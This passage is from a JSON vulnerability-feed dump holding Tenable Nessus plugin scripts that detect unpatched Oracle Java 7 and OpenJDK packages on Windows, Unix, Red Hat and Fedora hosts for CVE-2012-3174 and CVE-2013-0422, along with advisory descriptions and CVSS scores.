value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-oracle-1.7.0.11-1jpp.3.el5_9\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-1.7.0.11-1jpp.3.el5_9\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-oracle-devel-1.7.0.11-1jpp.3.el5_9\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-devel-1.7.0.11-1jpp.3.el5_9\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-oracle-javafx-1.7.0.11-1jpp.3.el5_9\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-javafx-1.7.0.11-1jpp.3.el5_9\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-oracle-jdbc-1.7.0.11-1jpp.3.el5_9\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-jdbc-1.7.0.11-1jpp.3.el5_9\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-oracle-plugin-1.7.0.11-1jpp.3.el5_9\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-plugin-1.7.0.11-1jpp.3.el5_9\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-oracle-src-1.7.0.11-1jpp.3.el5_9\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-src-1.7.0.11-1jpp.3.el5_9\")) flag++;\n\nif (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-oracle-1.7.0.11-1jpp.3.el6_3\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-1.7.0.11-1jpp.3.el6_3\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-oracle-devel-1.7.0.11-1jpp.3.el6_3\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-devel-1.7.0.11-1jpp.3.el6_3\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-oracle-javafx-1.7.0.11-1jpp.3.el6_3\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-javafx-1.7.0.11-1jpp.3.el6_3\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-oracle-jdbc-1.7.0.11-1jpp.3.el6_3\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-jdbc-1.7.0.11-1jpp.3.el6_3\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-oracle-plugin-1.7.0.11-1jpp.3.el6_3\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-plugin-1.7.0.11-1jpp.3.el6_3\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-oracle-src-1.7.0.11-1jpp.3.el6_3\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-src-1.7.0.11-1jpp.3.el6_3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T04:33:55", "description": "The version of Oracle (formerly Sun) Java SE or Java for Business\ninstalled on the remote host is earlier than 7 Update 11 and is,\ntherefore, potentially affected by the following security issues :\n\n - An unspecified issue exists in the Libraries\n component. (CVE-2012-3174)\n\n - An error exists in the 'MBeanInstantiator.findClass'\n method that could allow remote, arbitrary code execution.\n (CVE-2013-0422)\n\nNote that, according the advisory, these issues apply to client\ndeployments of Java only and can only be exploited through untrusted\n'Java Web Start' applications and untrusted Java applets.", "edition": 28, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2013-01-14T00:00:00", "title": "Oracle Java SE 7 < Update 11 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:oracle:jre", "cpe:/a:oracle:jdk"], "id": "ORACLE_JAVA7_UPDATE11.NASL", "href": "https://www.tenable.com/plugins/nessus/63521", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63521);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2019/12/04\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_xref(name:\"CERT\", value:\"625617\");\n script_xref(name:\"EDB-ID\", value:\"24045\");\n\n script_name(english:\"Oracle Java SE 7 < Update 11 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of the JRE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a programming platform that is\npotentially affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle (formerly Sun) Java SE or Java for Business\ninstalled on the remote host is earlier than 7 Update 11 and is,\ntherefore, potentially affected by the following security issues :\n\n - An unspecified issue exists in the Libraries\n component. (CVE-2012-3174)\n\n - An error exists in the 'MBeanInstantiator.findClass'\n method that could allow remote, arbitrary code execution.\n (CVE-2013-0422)\n\nNote that, according the advisory, these issues apply to client\ndeployments of Java only and can only be exploited through untrusted\n'Java Web Start' applications and untrusted Java applets.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-002/\");\n # http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eaf95a3d\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to JDK / JRE 7 Update 11 or later and, if necessary, remove any\naffected versions.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0422\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jre\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jdk\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sun_java_jre_installed.nasl\");\n script_require_keys(\"SMB/Java/JRE/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Check each installed JRE.\ninstalls = get_kb_list_or_exit(\"SMB/Java/JRE/*\");\n\ninfo = \"\";\nvuln = 0;\ninstalled_versions = \"\";\n\nforeach install (list_uniq(keys(installs)))\n{\n ver = install - \"SMB/Java/JRE/\";\n if (ver !~ \"^[0-9.]+\") continue;\n\n installed_versions = installed_versions + \" & \" + ver;\n\n if (ver =~ '^1\\\\.7\\\\.0_(0[0-9]|10)([^0-9]|$)')\n {\n dirs = make_list(get_kb_list(install));\n vuln += max_index(dirs);\n\n foreach dir (dirs)\n info += '\\n Path : ' + dir;\n\n info += '\\n Installed version : ' + ver;\n info += '\\n Fixed version : 1.7.0_11\\n';\n }\n}\n\n# Report if any were found to be vulnerable.\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Java are\";\n else s = \" of Java is\";\n\n report = \n '\\n' +\n 'The following vulnerable instance'+s+' installed on the\\n' +\n 'remote host :\\n' +\n info;\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse\n{\n installed_versions = substr(installed_versions, 3);\n if (\" & \" >< installed_versions) \n exit(0, \"The Java \"+installed_versions+\" installs on the remote host are not affected.\");\n else \n audit(AUDIT_INST_VER_NOT_VULN, \"Java\", installed_versions);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T04:33:55", "description": "The version of Oracle (formerly Sun) Java SE or Java for Business\ninstalled on the remote host is earlier than 7 Update 11 and is,\ntherefore, potentially affected by the following security issues :\n\n - An unspecified issue exists in the Libraries\n component. (CVE-2012-3174)\n\n - An error exists in the 'MBeanInstantiator.findClass'\n method that could allow remote, arbitrary code execution.\n (CVE-2013-0422)\n\nNote that, according the advisory, these issues apply to client\ndeployments of Java only and can only be exploited through untrusted\n'Java Web Start' applications and untrusted Java applets.", "edition": 26, "published": "2013-02-22T00:00:00", "title": "Oracle Java SE 7 < Update 11 Multiple Vulnerabilities (Unix)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:oracle:jre", "cpe:/a:oracle:jdk"], "id": "ORACLE_JAVA7_UPDATE11_UNIX.NASL", "href": "https://www.tenable.com/plugins/nessus/64840", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64840);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/12/04\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_xref(name:\"CERT\", value:\"625617\");\n script_xref(name:\"EDB-ID\", value:\"24045\");\n\n script_name(english:\"Oracle Java SE 7 < Update 11 Multiple Vulnerabilities (Unix)\");\n script_summary(english:\"Checks version of the JRE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a programming platform that is potentially\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle (formerly Sun) Java SE or Java for Business\ninstalled on the remote host is earlier than 7 Update 11 and is,\ntherefore, potentially affected by the following security issues :\n\n - An unspecified issue exists in the Libraries\n component. (CVE-2012-3174)\n\n - An error exists in the 'MBeanInstantiator.findClass'\n method that could allow remote, arbitrary code execution.\n (CVE-2013-0422)\n\nNote that, according the advisory, these issues apply to client\ndeployments of Java only and can only be exploited through untrusted\n'Java Web Start' applications and untrusted Java applets.\");\n # http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eaf95a3d\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to JDK / JRE 7 Update 11 or later and, if necessary, remove any\naffected versions.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0422\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jre\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jdk\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sun_java_jre_installed_unix.nasl\");\n script_require_keys(\"Host/Java/JRE/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Check each installed JRE.\ninstalls = get_kb_list_or_exit(\"Host/Java/JRE/Unmanaged/*\");\n\ninfo = \"\";\nvuln = 0;\nvuln2 = 0;\ninstalled_versions = \"\";\ngranular = \"\";\nforeach install (list_uniq(keys(installs)))\n{\n ver = install - \"Host/Java/JRE/Unmanaged/\";\n if (ver !~ \"^[0-9.]+\") continue;\n\n installed_versions = installed_versions + \" & \" + ver;\n\n if (ver =~ '^1\\\\.7\\\\.0_(0[0-9]|10)([^0-9]|$)')\n {\n dirs = make_list(get_kb_list(install));\n vuln += max_index(dirs);\n\n foreach dir (dirs)\n info += '\\n Path : ' + dir;\n\n info += '\\n Installed version : ' + ver;\n info += '\\n Fixed version : 1.7.0_11\\n';\n }\n else if (ver =~ \"^[\\d\\.]+$\")\n {\n dirs = make_list(get_kb_list(install));\n foreach dir (dirs)\n granular += \"The Oracle Java version \"+ver+\" at \"+dir+\" is not granular enough to make a determination.\"+'\\n';\n }\n else\n {\n dirs = make_list(get_kb_list(install));\n vuln2 += max_index(dirs);\n }\n\n}\n\n# Report if any were found to be vulnerable.\nif (info)\n{\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Java are\";\n else s = \" of Java is\";\n\n report =\n '\\n' +\n 'The following vulnerable instance'+s+' installed on the\\n' +\n 'remote host :\\n' +\n info;\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n if (granular) exit(0, granular);\n}\nelse\n{\n if (granular) exit(0, granular);\n installed_versions = substr(installed_versions, 3);\n if (vuln2 > 1)\n exit(0, \"The Java \"+installed_versions+\" installs on the remote host are not affected.\");\n else\n exit(0, \"The Java \"+installed_versions+\" install on the remote host is not affected.\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:10:49", "description": "This update fixes rhbz#895035 , which consists of a set of flaws that\npotentially allow arbitrary code execution (including remotely via\napplets).\n\nIt is strongly recommended that all Java users in Fedora immediately\nupdate to this release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2013-01-17T00:00:00", "title": "Fedora 16 : java-1.7.0-openjdk-1.7.0.9-2.3.4.fc16 (2013-0888)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2013-01-17T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:16", "p-cpe:/a:fedoraproject:fedora:java-1.7.0-openjdk"], "id": "FEDORA_2013-0888.NASL", "href": "https://www.tenable.com/plugins/nessus/63586", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-0888.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63586);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_xref(name:\"FEDORA\", value:\"2013-0888\");\n\n script_name(english:\"Fedora 16 : java-1.7.0-openjdk-1.7.0.9-2.3.4.fc16 (2013-0888)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes rhbz#895035 , which consists of a set of flaws that\npotentially allow arbitrary code execution (including remotely via\napplets).\n\nIt is strongly recommended that all Java users in Fedora immediately\nupdate to this release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=895035\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-January/096995.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?df90b29d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1.7.0-openjdk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:java-1.7.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:10:48", "description": "This update fixes rhbz#895035 , which consists of a set of flaws that\npotentially allow arbitrary code execution (including remotely via\napplets).\n\nIt is strongly recommended that all Java users in Fedora immediately\nupdate to this release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2013-01-17T00:00:00", "title": "Fedora 17 : java-1.7.0-openjdk-1.7.0.9-2.3.4.fc17 (2013-0868)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2013-01-17T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:java-1.7.0-openjdk"], "id": "FEDORA_2013-0868.NASL", "href": "https://www.tenable.com/plugins/nessus/63585", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-0868.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63585);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_xref(name:\"FEDORA\", value:\"2013-0868\");\n\n script_name(english:\"Fedora 17 : java-1.7.0-openjdk-1.7.0.9-2.3.4.fc17 (2013-0868)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes rhbz#895035 , which consists of a set of flaws that\npotentially allow arbitrary code execution (including remotely via\napplets).\n\nIt is strongly recommended that all Java users in Fedora immediately\nupdate to this release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=895035\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-January/096979.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0b57d281\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1.7.0-openjdk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:java-1.7.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-18T02:47:11", "description": "Two improper permission check issues were discovered in the reflection\nAPI in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2012-3174,\nCVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK 